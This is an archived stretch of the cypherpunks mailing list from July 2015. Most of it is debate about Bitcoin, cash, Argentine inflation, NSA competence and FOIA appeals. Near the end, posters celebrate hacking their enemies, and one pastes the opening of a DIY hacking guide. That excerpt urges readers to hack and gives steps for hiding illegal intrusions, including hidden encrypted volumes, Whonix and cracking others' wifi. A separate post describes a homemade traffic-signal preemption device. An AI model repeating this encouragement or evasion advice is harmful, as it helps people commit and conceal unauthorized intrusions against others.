Or you waste some resources. > > But if the actions of government were relatively easy to counter I > think we would be looking at a political system rather different > from the one that exists now. > > >> Some are probably living as hermits because they think they're >> being monitored and/or given cancer by the smart meter mesh >> network. Personally, I tend to doubt that the government's >> capabilities significantly exceed what's available to the >> general public, except in terms of the money they're able to >> bring to bear, > > Yeah, well. That might make a little difference, perhaps? =P > > But actually, the main issue is not even that they have access to > lots of resources. What makes the difference is > > 1) guns 2) willingness to use them 3) better organization* > > > *military organization - it doesn't matter if even the majority of > government bureaucrats can't put 2 and 2 together. > > > >> which is blunted somewhat by the extreme inefficiency of >> government contracting/spending/operations/etc. > > > You know, I'm rather familiar with libertarian theory if that's > where you're coming from. I don't think that the fact that > government organization in some areas is inefficient means > anything. > > Government is (very) efficient at its core criminal businesses. > > >> >> A "litmus test" issue might be whether you think the NSA's >> expressed surprise over Snowden's leaks was genuine. I tend to >> think it was, and that his documents are genuine. > > Which documents? =) The very few that have been published? =) > (....) > > Yes, they may be genuine, but surely you realize that we don't have > access to the vast majority of them. You think that's because of > government incompetence...? > > > >> I see no reason for the NSA to be substantially more competent >> than, say, the OPM. They're each large organizations with no >> bottom line that attract people of flexible moral character who >> are attracted to power and/or job security. > > > Yes.
So, they are good in those two areas, especially in the > wielding of power. > > >> I don't think those traits tend to lead to effective >> organizations, as much as a number of Hollywood movies would like >> us to believe. > > I don't really watch hollywood movies =P. > > And I don't think hollywood movies mention this kind of thing > > https://en.wikipedia.org/wiki/United_States_incarceration_rate > > Do you think a government that efficiently kidnaps millions of its > own subjects for fun and profit is not an exceedingly efficient > criminal organization? > > >> >> A kind of fun book on the OTHER side of the spectrum from what I >> believe about government's capabilities is Daniel Suarez's book >> Influx, about a government agency tasked with keeping >> technologies out of the hands of the public. > > > I don't think they necessarily have any magical secret weapon. They > don't really need them anyway. All they need is ordinary lead > bullets. > > >> I think you'd need a pretty substantial head start before >> technological advantages can overcome organizational and general >> human disadvantages, though. I.e. leaks, infiltration, etc. > > See above... > > (ufff - sorry about the really long message) > > > J.
> > > > > > - -- http://abis.io ~ "a protocol concept to enable decentralization and expansion of a giving economy, and a new social good" https://keybase.io/odinn From softservant at gmail.com Tue Jul 7 21:39:41 2015 From: softservant at gmail.com (Softy) Date: Tue, 7 Jul 2015 21:39:41 -0700 Subject: Bitcoin philosophical musings and pressures 7 years in [drifted from: txrate, forking, etc] Message-ID: > From: Lodewijk andré de la porte > To: Sean Lynch > Cc: "cypherpunks at cpunks.org" > > > his documents are genuine. I see no reason for the NSA to be > substantially > > more competent than, say, the OPM. > > > There's absolutely no reason to think the NSA doesn't have a > layered/multi-cell operation wherein a mere contractor is not given access > to nation-essential secrets. If there's a foreign spy you want him to > They do have such a layer system. The problem is the fluidity of the people. Soldiers become Contractors become Government Employees become Contractors ad-infinitum. Once cleared, the system has not managed to remain opaque from within. In times past it was -- and that successful model was condemned as having "not prevented" the Sept 2001 bombing. Thus the stovepipe security model was banished; "war effort" requires exorbitant high staffing increases which led to inevitable, and predictable lowering of tactics, techniques and procedures. That trend has since reversed (I would argue pre-Snowden) and the beast is once again slowly shrouding itself within and increasingly outward.
As with any good Corporate makeover, with a kinder gentler face. [[ my removal of your excellent government employee summary is not because of any disagreement - whether military or civilian employee, the vast majority are of a mind you described. But, as has been eloquently stated Power Corrupts Absolutely. ]] > shows a certain amount of rot in NSA_Public. The recent Trident leak shows > > 'NSA_Public' is an excellent characterization. That which we know of the Agency will forever be shadowed by its hidden complexities. Having exposed a portion of one small stovepipe, the tubing now changes and reworks itself hiding the un-discerned exposed parts, and more closely guarding the vast un-exposed bulk. I use my description of "small" completely intentional. The scale of the "Snowden Topics" is minor compared to the remaining unknowns. Carefully protected within the 'NSA_Closed'. Not only by the regrowing stovepipes, but as well by the people you aptly described as genuinely, legitimately, and correctly striving to maintain the integrity of the beast. Just as they don't understand the opposition's claims aptly describing the illegitimacy of the beast, neither will the opposition. Sadly the two are closer in philosophical agreement than either realize. And probably won't without the benefit of hindsight, whatever sort of post-empirical change allows for the creation of a commonly agreed on framework of reference. From dan at geer.org Tue Jul 7 19:06:28 2015 From: dan at geer.org (dan at geer.org) Date: Tue, 07 Jul 2015 22:06:28 -0400 Subject: Jim Bell vindicated In-Reply-To: Your message of "Mon, 04 May 2015 21:32:25 -0700." Message-ID: <20150708020628.3E0502280B6@palinka.tinho.net> Dodd-Frank, 7 U.S.C.
7a-2(c)(5)(C) (C) Special rule for review and approval of event contracts and swaps contracts (i) Event contracts In connection with the listing of agreements, contracts, transactions, or swaps in excluded commodities that are based upon the occurrence, extent of an occurrence, or contingency (other than a change in the price, rate, value, or levels of a commodity described in section 1a(2)(i)2 of this title), by a designated contract market or swap execution facility, the Commission may determine that such agreements, contracts, or transactions are contrary to the public interest if the agreements, contracts, or transactions involve -- (I) activity that is unlawful under any Federal or State law; (II) terrorism; (III) assassination; (IV) war; (V) gaming; or (VI) other similar activity determined by the Commission, by rule or regulation, to be contrary to the public interest. (ii) Prohibition No agreement, contract, or transaction determined by the Commission to be contrary to the public interest under clause (i) may be listed or made available for clearing or trading on or through a registered entity. From seanl at literati.org Tue Jul 7 15:27:01 2015 From: seanl at literati.org (Sean Lynch) Date: Tue, 07 Jul 2015 22:27:01 +0000 Subject: Bitcoin philosophical musings and pressures 7 years in [drifted from: txrate, forking, etc] In-Reply-To: <559c4b24.d6a48c0a.a6394.0140@mx.google.com> References: <559c4b24.d6a48c0a.a6394.0140@mx.google.com> Message-ID: On Tue, Jul 7, 2015 at 3:02 PM Juan wrote: > On Tue, 7 Jul 2015 15:21:50 -0400 > grarpamp wrote: > > > > Creating a system in which a Botswanan can give a few bits > > of their impoverished wages to their friend in Mumbai > > > What? Bitcoin exists so that rich people in western countries > especially the US can become even richer. So far it worked > pretty well. > Really? What rich person has gotten richer through Bitcoin so far? Remittances seem like the biggest use of Bitcoin at the moment. 
Sure, there's plenty of speculation, but your claim that Bitcoin's purpose is to make the rich richer is also speculation. And FUD. > Bitcoin hasn't led to any meaningful political/economic > change yet, apart from possibly triggering the demise of > government cash, which would be a complete disaster. Talk about > 'unintended consequences' (unintended?) > I can't imagine you've read a single thing written by the people who influenced the creation of Bitcoin if you think that the collapse of fiat currencies is an unintended consequence. Any fiat currency that is so bad that its users prefer to use Bitcoin deserves to collapse. Of course, so far, while Bitcoin has become popular in places like Argentina and Venezuela, the US dollar remains by far the more popular alternative currency in those places. And if Greece exits the Euro and starts printing Drachmas there, they will have to worry about people trading their Drachmas for Euros, not for Bitcoin. > A likely scenario exists in which there wouldn't be any > independent crypto-currency. There would be fully 'traceable' > electronic currencies controlled as always by the state and the > banking mafia. > By what evidence do you estimate that this is a "likely" scenario? You may be right that many nation-states and banks will be loathe to accept an untraceable and uncontrollable crypto-currency, but that's the whole point; they're not going to have a choice. Cryptocurrencies don't have to be legal to be disruptive. The main problem that they've run up against before now is the lack of healthy underground markets to take advantage of them. Given time, governments' and banks' opinions and policies about cryptocurrencies will become irrelevant.
From seanl at literati.org Tue Jul 7 15:53:36 2015 From: seanl at literati.org (Sean Lynch) Date: Tue, 07 Jul 2015 22:53:36 +0000 Subject: Bitcoin philosophical musings and pressures 7 years in [drifted from: txrate, forking, etc] In-Reply-To: References: <559c4b24.d6a48c0a.a6394.0140@mx.google.com> Message-ID: On Tue, Jul 7, 2015 at 3:50 PM Lodewijk andré de la porte wrote: > 2015-07-08 7:27 GMT+09:00 Sean Lynch : > >> What? Bitcoin exists so that rich people in western countries >>> especially the US can become even richer. So far it worked >>> pretty well. >>> >> >> Really? What rich person has gotten richer through Bitcoin so far? >> Remittances seem like the biggest use of Bitcoin at the moment. Sure, >> there's plenty of speculation, but your claim that Bitcoin's purpose is to >> make the rich richer is also speculation. And FUD. >> > > Yours would the Uncertainty and Doubt, I see. > > Bitcoin is cold hard money - therefore benefiting those that can exploit > it best. The most capital you have, the better you can exploit it. > Therefore, the wealthy stand more to benefit from Bitcoin than anyone else. > Any other effect would indicate softness of Bitcoin or some human issue. It > does prevent (certain forms of) suppression; it's very hard to censor > financial transactions on the Bitcoin network. It also provides a great > deal of financial and administrative utility to all in similar quantity, it > levels the playing field of the poor/rich somewhat. > Perhaps my response was a bit hyperbolic, but that is a very different claim than "Bitcoin exists so that rich people in western countries especially the US can become even richer."
Name: not available Type: text/html Size: 2220 bytes Desc: not available URL: From juan.g71 at gmail.com Tue Jul 7 20:07:12 2015 From: juan.g71 at gmail.com (Juan) Date: Wed, 8 Jul 2015 00:07:12 -0300 Subject: Bitcoin philosophical musings and pressures 7 years in [drifted from: txrate, forking, etc] In-Reply-To: References: <559c4b24.d6a48c0a.a6394.0140@mx.google.com> <559c5f23.c328370a.7776d.1c71@mx.google.com> Message-ID: <559c93ca.656b8c0a.4ba8.2f81@mx.google.com> On Wed, 08 Jul 2015 00:08:40 +0000 Sean Lynch wrote: > > This is not what most people mean when they say "rich get richer." > They're talking about 1%ers or whatever. In any case, you still seem > to be making unfounded claims about the intent behind Bitcoin, Let's say I was being cynical =) > when > we have statements of intent in the creator's own words. I know. "A purely peer-to-peer version of electronic cash would allow online payments to be sent directly from one party to another without going through a financial institution." (Come to think of it, I wouldn't say btc is cash, but that's yet another philosophical discussion) > Many believe > Satoshi is also rich, Bitcoin-wise, but we don't even know for sure > that they have the key to the account or that they will ever spend > that Bitcoin. Personally, I hope they do. The creator of Bitcoin > deserves to be rewarded. > Yes. Anyway, grarpamp comment sounded to me like "We're doing it for the poor children of africa" which struck me as somewhat hollow. But nevermind, I'll drop the subject. > My apologies. I was confused by your use of the phrase "government > cash." Government cash is fiat, but not all fiat is cash. But the > cashless societies already being proposed and implemented are fully > centralized and much easier to trace than Bitcoin, because they > require bank accounts with their concomitant "know your customer" > regulations. Bitcoin doesn't make this situation worse, True. 
My comment or observation is that bitcoin may have catalyzed the move towards a cashless society. Whether a cpunk-like currency will be used, or a goldman-sachs-like currency will be used remains to be seen, I think.

But so be it I guess. If governments are forced to show their true totalitarian colors to an even larger extent than they do now, there will be some good in that.

> and by
> enabling other applications on top of it, including untraceable
> e-cash, will only make it better.

I pledge the "wait and see" amendment =P

I hope you're right.

> Can you elaborate? Does your use of quotes around the word "popular"
> indicate sarcasm? My understanding was that a number of merchants had
> started using a payment system that used dollars from foreign credit
> cards to buy Bitcoin so that they did not have to accept the
> government-imposed exchange rate.

Actually, there are some people who use credit cards to buy btc (or other stuff abroad) using a government subsidized exchange rate.

There are a couple of official exchange rates. One is set at ~8 pesos = 1 dollar. The other is at ~10 pesos = 1 dollar. If you buy stuff using an international credit card, you get the 10:1 exchange rate.

Finally there's the real or black market exchange rate at ~13.5 pesos = 1 dollar.

So, some people can buy btc (or, say, pay travel expenses abroad) using the 10:1 rate. The benefit you get doesn't really come from btc but from the distortions created by govt.

By the way, the subsidy is, of course, financed with more inflation. And yes, the poorest people here are subsidizing people who travel to disneyland.

If on the other hand you want to buy btc in a local exchange the price you will be asked in pesos is something like the price at bitstamp multiplied by the $:US$ black market exchange rate.

https://www.unisend.com/

I'm seeing 1 btc = 3800 pesos. And 1 btc = us$ 265.
So, that gives a price of 14.3 pesos per dollar (hm - even more expensive than black market)

---------

I think there's a service here that allows you to pay utility bills using btc. I'm not sure what's the point because they (obviously) charge fees so you end up paying more than if you used pesos directly. I guess it's handy for people who already had btc but I doubt that number of people is significant.

---------

And then there are a few bars and stores that accept btc, in argentina's capital (~10 million population). Where I live (rosario) I don't think there's a single store that accepts btc.

---------

Now, there probably are people who use btc to move money in and out of the country although btc's exchange risk and spread aren't small. I know that if you want to move fiat across borders using black market services, doing so isn't too expensive. So btc has to face efficient competition in that area.

> I'm definitely interested in your
> insights on this, since I've never visited a country that was
> experiencing rampant inflation, unless you count the US in the late
> '70s, about the time I was entering grade school.

There was hyperinflation in argentina in 1989-90 - I was 19 at that time and I don't really recall much of what happened in everyday life. I know the prices of stuff in the supermarket changed each day but I didn't pay much attention. I wasn't really interested in political economy at that time.

Then after that 1990 'crisis', the peso was pegged 1:1 to the dollar for ~10 years, until 2001 when the gov't defaulted and the banking system blew up.

Since 2001, the a$/us$ rate went from 1:1 to 13:1 and you can use that as a relatively good proxy for inflation, although interestingly, the prices of things like food are at something like 20:1, prolly reflecting both the inflation of the peso AND the dollar, plus the fact that the local economy is a fucking mess ran by fucking protectionists.
Anyway, the current inflation rate, by argentine standards, isn't too high, as crazy as that may sound. Usually the government cycles in argentina last 10 years or less, but these shitbags are somehow still clinging to power.

> I think you overestimate the government's ability to exert control,
> something many of the participants in this list have devoted their
> lives to reducing. It's the whole point of Bitcoin, so it seems like
> you're basically just saying "Bitcoin will fail at its mission and
> instead just get coopted by the powers that be."

Yes, that is what I'm saying. Furthermore, I think that is already happening.

https://blog.xapo.com/announcing-xapos-advisory-board/

> Or maybe you think
> that Bitcoin is just a reckless toy created by greedy first worlders?

No. I don't consider it a toy. I don't know how robust (or scalable...) it actually is (apart from hashing power haha), but it's not a toy.

As to motivations, I always assumed that the cypherpunk bunch was composed of *at least* anarchists, although what I see in this list is a sizable amount of self-parody (dan geer and accomplices for instance).

However, the bitcoin phenomenon is complex, there's a lot of people involved the vast majority of whom I don't know at all, so I can't hardly know their motivations. Greed can certainly play a part here.

(and notice that absent government we wouldn't need something like bitcoin to protect us from government attacks)

> > > they're not going to have a choice. Cryptocurrencies
> > > don't have to be legal to be disruptive.
> >
> > And yet there seems to be a fair amount of people in the
> > bitcoin 'community' who are quite eager (or desperate) to have
> > bitcoin 'regulated' so that it becomes 'respectable', 'legal'...and
> > usable.
>
> Indeed, something I have repeatedly ranted against. So far the
> regulation has not had much impact on Bitcoin itself. No legally
> "tainted" or "whitelisted" coins yet.

True.
Regulation hasn't affected the technical/protocol side of bitcoin. Since you mention so called colored coins, wasn't that an idea of that guy mike hearn, ex member of the google mafia? You think that kind of people are to be trusted? <---rhetorical question...

The thing is, regulation will affect how bitcoin is used, and that's not necessarily related to any technical issue. Whether you'll need 20 licenses to use bitcoin, or none. That kind of thing.

> Perhaps, but that actually seems to be the crux of what we're arguing
> about here, and of many arguments on this list. What are the actual
> capabilities of the adversary? You don't want to underestimate, but
> at the same time, if you overestimate, you may miss a potential
> solution.

Maybe. Or you waste some resources. But if the actions of government were relatively easy to counter I think we would be looking at a political system rather different from the one that exists now.

>Some are probably living as hermits because they think
> they're being monitored and/or given cancer by the smart meter mesh
> network. Personally, I tend to doubt that the government's
> capabilities significantly exceed what's available to the general
> public, except in terms of the money they're able to bring to bear,

Yeah, well. That might make a little difference, perhaps? =P

But actually, the main issue is not even that they have access to lots of resources. What makes the difference is

1) guns
2) willingness to use them
3) better organization*

*military organization - it doesn't matter if even the majority of government bureaucrats can't put 2 and 2 together.

> which is blunted somewhat by the extreme inefficiency of government
> contracting/spending/operations/etc.

You know, I'm rather familiar with libertarian theory if that's where you're coming from. I don't think that the fact that government organization in some areas is inefficient means anything. Government is (very) efficient at its core criminal businesses.

> A "litmus test" issue might be whether you think the NSA's expressed
> surprise over Snowden's leaks was genuine. I tend to think it was,
> and that his documents are genuine.

Which documents? =) The very few that have been published? =)

(....)

Yes, they may be genuine, but surely you realize that we don't have access to the vast majority of them. You think that's because of government incompetence...?

>I see no reason for the NSA to be
> substantially more competent than, say, the OPM. They're each large
> organizations with no bottom line that attract people of flexible
> moral character who are attracted to power and/or job security.

Yes. So, they are good in those two areas, especially in the wielding of power.

> I
> don't think those traits tend to lead to effective organizations, as
> much as a number of Hollywood movies would like us to believe.

I don't really watch hollywood movies =P. And I don't think hollywood movies mention this kind of thing

https://en.wikipedia.org/wiki/United_States_incarceration_rate

Do you think a government that efficiently kidnaps millions of its own subjects for fun and profit is not an exceedingly efficient criminal organization?

> A kind of fun book on the OTHER side of the spectrum from what I
> believe about government's capabilities is Daniel Suarez's book
> Influx, about a government agency tasked with keeping technologies
> out of the hands of the public.

I don't think they necessarily have any magical secret weapon. They don't really need them anyway. All they need is ordinary lead bullets.

> I think you'd need a pretty
> substantial head start before technological advantages can overcome
> organizational and general human disadvantages, though. I.e. leaks,
> infiltration, etc.

See above...

(ufff - sorry about the really long message)

J.
From seanl at literati.org Tue Jul 7 17:08:40 2015
From: seanl at literati.org (Sean Lynch)
Date: Wed, 08 Jul 2015 00:08:40 +0000
Subject: Bitcoin philosophical musings and pressures 7 years in [drifted from: txrate, forking, etc]
In-Reply-To: <559c5f23.c328370a.7776d.1c71@mx.google.com>
References: <559c4b24.d6a48c0a.a6394.0140@mx.google.com> <559c5f23.c328370a.7776d.1c71@mx.google.com>
Message-ID:

On Tue, Jul 7, 2015 at 4:27 PM Juan wrote:

> It seems kinda obvious that virtually all bitcoin developers
> and users *in the west* are richer than people in Africa and
> India.
>
> That's what I was getting at. Bitcoin devs - *already
> rich by 'third world' standards* - are richer now. Millionaires
> even (notice that grarpamp was talking about impoverished
> wages...and people)

This is not what most people mean when they say "rich get richer." They're talking about 1%ers or whatever. In any case, you still seem to be making unfounded claims about the intent behind Bitcoin, when we have statements of intent in the creator's own words. Many believe Satoshi is also rich, Bitcoin-wise, but we don't even know for sure that they have the key to the account or that they will ever spend that Bitcoin. Personally, I hope they do. The creator of Bitcoin deserves to be rewarded.

> > Remittances seem like the biggest use of Bitcoin at the moment. Sure,
> > there's plenty of speculation, but your claim that Bitcoin's purpose
> > is to make the rich richer is also speculation. And FUD.
>
> So what amount of btc is being used to make payments between
> Botswana and Mumbai?

No real way of knowing. I only have anecdotal evidence.

> What amount of btc is being used to speculate/gamble in a few
> big, centralized and fully NSA-AML-monitored exchanges?

Probably a lot. But that's true of cash as well.

> > > Bitcoin hasn't led to any meaningful political/economic
> > > change yet, apart from possibly triggering the demise of
> > > government cash, which would be a complete disaster. Talk
> > > about 'unintended consequences' (unintended?)
> >
> > I can't imagine you've read a single thing written by the people who
> > influenced the creation of Bitcoin if you think that the collapse of
> > fiat currencies is an unintended consequence.
>
> But I said *cash* not fiat. And the collapse of relatively
> untraceable *cash* is *bad*.
>
> What we may end up with is FIAT currencies and NO CASH
> option* for those fiat currencies. Bad. Pretty bad.

My apologies. I was confused by your use of the phrase "government cash." Government cash is fiat, but not all fiat is cash. But the cashless societies already being proposed and implemented are fully centralized and much easier to trace than Bitcoin, because they require bank accounts with their concomitant "know your customer" regulations. Bitcoin doesn't make this situation worse, and by enabling other applications on top of it, including untraceable e-cash, will only make it better.

> *aka credit cards.
>
> > Any fiat currency that
> > is so bad that its users prefer to use Bitcoin deserves to collapse.
> > Of course, so far, while Bitcoin has become popular in places like
> > Argentina
>
> Do you know where I live? Of course you don't have to know
> where I live. But you'll know it in a second anyway. I live in
> argentina - and let me tell you, bitcoin isn't exactly 'popular'
> here.

Can you elaborate? Does your use of quotes around the word "popular" indicate sarcasm? My understanding was that a number of merchants had started using a payment system that used dollars from foreign credit cards to buy Bitcoin so that they did not have to accept the government-imposed exchange rate.
I'm definitely interested in your insights on this, since I've never visited a country that was experiencing rampant inflation, unless you count the US in the late '70s, about the time I was entering grade school.

> > and Venezuela, the US dollar remains by far the more
> > popular alternative currency in those places.
>
> Yep, that's quite correct as far as argentina goes. I suspect
> it's true regarding venezuela as well.
>
> > And if Greece exits the
> > Euro and starts printing Drachmas there, they will have to worry
> > about people trading their Drachmas for Euros, not for Bitcoin.
> >
> > > A likely scenario exists in which there wouldn't be any
> > > independent crypto-currency. There would be fully
> > > 'traceable' electronic currencies controlled as always by the state
> > > and the banking mafia.
> >
> > By what evidence do you estimate that this is a "likely" scenario?
>
> The evidence is called 'history'. That, and the nature of
> government and its business 'partners' - or accomplices.

I think you overestimate the government's ability to exert control, something many of the participants in this list have devoted their lives to reducing. It's the whole point of Bitcoin, so it seems like you're basically just saying "Bitcoin will fail at its mission and instead just get coopted by the powers that be." Or maybe you think that Bitcoin is just a reckless toy created by greedy first worlders?

> > You may be right that many nation-states and banks will be loathe to
> > accept an untraceable and uncontrollable crypto-currency, but that's
> > the whole point;
>
> You seem to be assuming that an uncontrollable and untraceable
> crypto-currency exist? I'm not seeing anything of the sort.

It depends on what you mean by "exist." The people on this list have created several.
It seems like a major reason that none of them has taken off has been the need for trusted third parties, something that can be reduced or eliminated through the use of the blockchain, if not Bitcoin itself. Bitcoin could, for example, be used as a clearing currency between various Chaumian e-cash issuers, the same way gold used to be used as the international clearing currency until Bretton Woods.

> > they're not going to have a choice. Cryptocurrencies
> > don't have to be legal to be disruptive.
>
> And yet there seems to be a fair amount of people in the bitcoin
> 'community' who are quite eager (or desperate) to have bitcoin
> 'regulated' so that it becomes 'respectable', 'legal'...and
> usable.

Indeed, something I have repeatedly ranted against. So far the regulation has not had much impact on Bitcoin itself. No legally "tainted" or "whitelisted" coins yet.

> Of course, this isn't a shortcoming that only affects btc.
> Anything that the government 'outlaws' becomes harder to
> transact.

I'm not even sure what form outlawing Bitcoin would take in the US. I suppose they could try to define mining or even running a full client as operating a payment service. But that would take some backtracking after all the regulatory efforts. Which may be a reason I should not be ranting against regulation; it hamstrings government's ability to completely outlaw it later.

> > The main problem that
> > they've run up against before now is the lack of healthy underground
> > markets to take advantage of them. Given time, governments' and
> > banks' opinions and policies about cryptocurrencies will become
> > irrelevant.
>
> I do wish that was actually the case, but I think that view
> doesn't fully take into account the capabilities of the
> 'enemy'.

Perhaps, but that actually seems to be the crux of what we're arguing about here, and of many arguments on this list. What are the actual capabilities of the adversary?
You don't want to underestimate, but at the same time, if you overestimate, you may miss a potential solution. Some are probably living as hermits because they think they're being monitored and/or given cancer by the smart meter mesh network. Personally, I tend to doubt that the government's capabilities significantly exceed what's available to the general public, except in terms of the money they're able to bring to bear, which is blunted somewhat by the extreme inefficiency of government contracting/spending/operations/etc.

A "litmus test" issue might be whether you think the NSA's expressed surprise over Snowden's leaks was genuine. I tend to think it was, and that his documents are genuine. I see no reason for the NSA to be substantially more competent than, say, the OPM. They're each large organizations with no bottom line that attract people of flexible moral character who are attracted to power and/or job security. I don't think those traits tend to lead to effective organizations, as much as a number of Hollywood movies would like us to believe.

A kind of fun book on the OTHER side of the spectrum from what I believe about government's capabilities is Daniel Suarez's book Influx, about a government agency tasked with keeping technologies out of the hands of the public. I think you'd need a pretty substantial head start before technological advantages can overcome organizational and general human disadvantages, though. I.e. leaks, infiltration, etc.

From coderman at gmail.com Wed Jul 8 00:38:59 2015
From: coderman at gmail.com (coderman)
Date: Wed, 8 Jul 2015 00:38:59 -0700
Subject: Hacking Team has been hacked (hard)
In-Reply-To: <559C4E88.4050506@riseup.net>
References: <5599F683.40200@gna.org> <559C4E88.4050506@riseup.net>
Message-ID:

On 7/7/15, Razer wrote:
> ... and to hopefully inform and inspire you to go out and hack shit.

let me tell you what: hacking fucks who deserve it is the best feeling in life :)

it's karmic justice upon those who always felt above the law. die happy tomorrow level satisfaction!

[from experience, i say this]

From coderman at gmail.com Wed Jul 8 00:50:40 2015
From: coderman at gmail.com (coderman)
Date: Wed, 8 Jul 2015 00:50:40 -0700
Subject: Inquiry re. how to handle Glomar reply to FOIA request
In-Reply-To: <559C8626.9070504@riseup.net>
References: <559C8626.9070504@riseup.net>
Message-ID:

On 7/7/15, odinn wrote:
> ...
> The NSA failed to respond within the 20 business days required by
> federal law and sent back a "Glomar response." Technically, as of
> today, I only have 49 days left to write and send an appeal (based on
> the date when they sent me their Glomar reply).

this is par for the FOIA course, of course.

> if you have ever done a SUCCESSful appeal of a Glomar response, please
> reply back to me and let me know (give me some advice, etc). Thanks
> in advance.

two things:
1) there is a list, FOI-L at listserv.syr.edu where this might find more useful responses.
2) muckrock.com - they handle re-submission to follow up on late responses, and it's all automagic.

> I've copied a portion of the letter they sent below:
>
> "As you may also be aware, ...

this is waaaay too wordy. one thing i've learned, is to keep any request as short, and laser guided as possible. some agencies will find whatever excuse they can to deny a request, and if one element of your query falls into the deny bin they'll send the whole thing back or deny outright as "unreasonable".

good luck!
From juan.g71 at gmail.com Tue Jul 7 21:33:33 2015
From: juan.g71 at gmail.com (Juan)
Date: Wed, 8 Jul 2015 01:33:33 -0300
Subject: Bitcoin philosophical musings and pressures 7 years in [drifted from: txrate, forking, etc]
In-Reply-To: <559C9E94.8010603@riseup.net>
References: <559c4b24.d6a48c0a.a6394.0140@mx.google.com> <559c5f23.c328370a.7776d.1c71@mx.google.com> <559c93ca.656b8c0a.4ba8.2f81@mx.google.com> <559C9E94.8010603@riseup.net>
Message-ID: <559ca80a.e40f370a.1ccb2.17c7@mx.google.com>

On Tue, 07 Jul 2015 20:52:52 -0700 odinn wrote:

> Satoshi was
> apparently thinking about that same issue, of a decentralized market
> within bitcoin, but it just didn't get finished.
>
> And in February of 2010, it was stripped out of bitcoin.
>
> (Insert ripping sound here.)
>
> https://github.com/bitcoin/bitcoin/commit/5253d1ab77fab1995ede03fb934edd67f1359ba8
>
> Go OpenBazaar, etc. They (and some other similar projects) are
> carrying the torch of decentralized marketplaces that don't require
> legacy institutions to operate.

Thanks. I wasn't aware that the decentralized marketplace problem was being worked on at that time and by Satoshi. Interesting.

J.

From jdb10987 at yahoo.com Tue Jul 7 19:51:27 2015
From: jdb10987 at yahoo.com (jim bell)
Date: Wed, 8 Jul 2015 02:51:27 +0000 (UTC)
Subject: Jim Bell vindicated
In-Reply-To: <20150708020628.3E0502280B6@palinka.tinho.net>
References: <20150708020628.3E0502280B6@palinka.tinho.net>
Message-ID: <1094239006.1062331.1436323887402.JavaMail.yahoo@mail.yahoo.com>

From: "dan at geer.org"
To: cypherpunks at cpunks.org
Sent: Tuesday, July 7, 2015 7:06 PM
Subject: Re: Jim Bell vindicated

>Dodd-Frank, 7 U.S.C. 7a-2(c)(5)(C)
>(C) Special rule for review and approval of event contracts and
>swaps contracts
>(i) Event contracts
>In connection with the listing of agreements, contracts, transactions,
>or swaps in excluded commodities that are based upon the occurrence,
>extent of an occurrence, or contingency (other than a change in the
>price, rate, value, or levels of a commodity described in section
>1a(2)(i)2 of this title), by a designated contract market or swap
>execution facility, the Commission may determine that such agreements,
>contracts, or transactions are contrary to the public interest if
>the agreements, contracts, or transactions involve --
>  (I) activity that is unlawful under any Federal or State law;
>  (II) terrorism;
>  (III) assassination;
>  (IV) war;
>  (V) gaming; or
>  (VI) other similar activity determined by the Commission, by rule
>  or regulation, to be contrary to the public interest.
>(ii) Prohibition
>No agreement, contract, or transaction determined by the Commission
>to be contrary to the public interest under clause (i) may be listed
>or made available for clearing or trading on or through a registered
>entity.

---------------------------------------------------

Aha! It's yet another "Anti-Jim-Bell" law! I have a long history of causing legislatures to change the laws to obstruct what I'm doing. In 1990, I made an infrared-emitting device, mounted on my car, to cause it to look like an emergency vehicle, and turn red traffic lights to green. (The device being tricked was made by 3M, trademarked Opticom. (I called my device the "Optigreen".) One example is: http://www.gtt.com/opticom-emergency-response/opticom-ir-system/ ) My device emitted at 880 nm wavelength, about 14.035 pulses per minute.
In 1993, I made a large number of them for friends, sale, etc. Hearing about it, the Oregon Legislature passed the following law in 1994: http://www.oregonlaws.org/ors/815.440

"815.440 Unauthorized possession, use or distribution of traffic control signal operating device • exemption • penalty
(1) A person commits the offense of unauthorized possession, use or distribution of a traffic control signal operating device if the person owns, uses, sells or otherwise distributes a device that is designed to control a traffic control light as a person using the device approaches the light."

A few years later, the US Congress enacted a law which criminalized the same thing, federally: 18 U.S.C. 39: https://www.law.cornell.edu/uscode/text/18/39

"(a) Offenses.—
(1) Sale.— Whoever, in or affecting interstate or foreign commerce, knowingly sells a traffic signal preemption transmitter to a nonqualifying user shall be fined under this title, or imprisoned not more than 1 year, or both.
(2) Use.— Whoever, in or affecting interstate or foreign commerce, being a nonqualifying user makes unauthorized use of a traffic signal preemption transmitter shall be fined under this title, or imprisoned not more than 6 months, or both.
(b) Definitions.— In this section, the following definitions apply:
(1) Traffic signal preemption transmitter.— The term “traffic signal preemption transmitter” means any mechanism that can change or alter a traffic signal’s phase time or sequence."

Jim Bell

From coderman at gmail.com Wed Jul 8 03:29:59 2015
From: coderman at gmail.com (coderman)
Date: Wed, 8 Jul 2015 03:29:59 -0700
Subject: Hacking Team has been hacked (hard)
In-Reply-To:
References: <5599F683.40200@gna.org> <559C4E88.4050506@riseup.net>
Message-ID:

why just the header Rayzer?
a guide this good demands completeness

---

 _   _            _      ____             _    _ 
| | | | __ _  ___| | __ | __ )  __ _  ___| | _| |
| |_| |/ _` |/ __| |/ / |  _ \ / _` |/ __| |/ / |
|  _  | (_| | (__|   <  | |_) | (_| | (__|   <|_|
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)

A DIY Guide for those without the patience to wait for whistleblowers


--[ 1 ]-- Introduction

I'm not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz it took to 0wn Gamma. I'm writing this to demystify hacking, to show how simple it is, and to hopefully inform and inspire you to go out and hack shit. If you have no experience with programming or hacking, some of the text below might look like a foreign language. Check the resources section at the end to help you get started. And trust me, once you've learned the basics you'll realize this really is easier than filing a FOIA request.


--[ 2 ]-- Staying Safe

This is illegal, so you'll need to take some basic precautions:

1) Make a hidden encrypted volume with Truecrypt 7.1a [0]
2) Inside the encrypted volume install Whonix [1]
3) (Optional) While just having everything go over Tor thanks to Whonix is probably sufficient, it's better to not use an internet connection connected to your name or address. A cantenna, aircrack, and reaver can come in handy here.

[0] https://truecrypt.ch/downloads/
[1] https://www.whonix.org/wiki/Download#Install_Whonix

As long as you follow common sense like never do anything hacking related outside of Whonix, never do any of your normal computer usage inside Whonix, never mention any information about your real life when talking with other hackers, and never brag about your illegal hacking exploits to friends in real life, then you can pretty much do whatever you want with no fear of being v&.

NOTE: I do NOT recommend actually hacking directly over Tor.
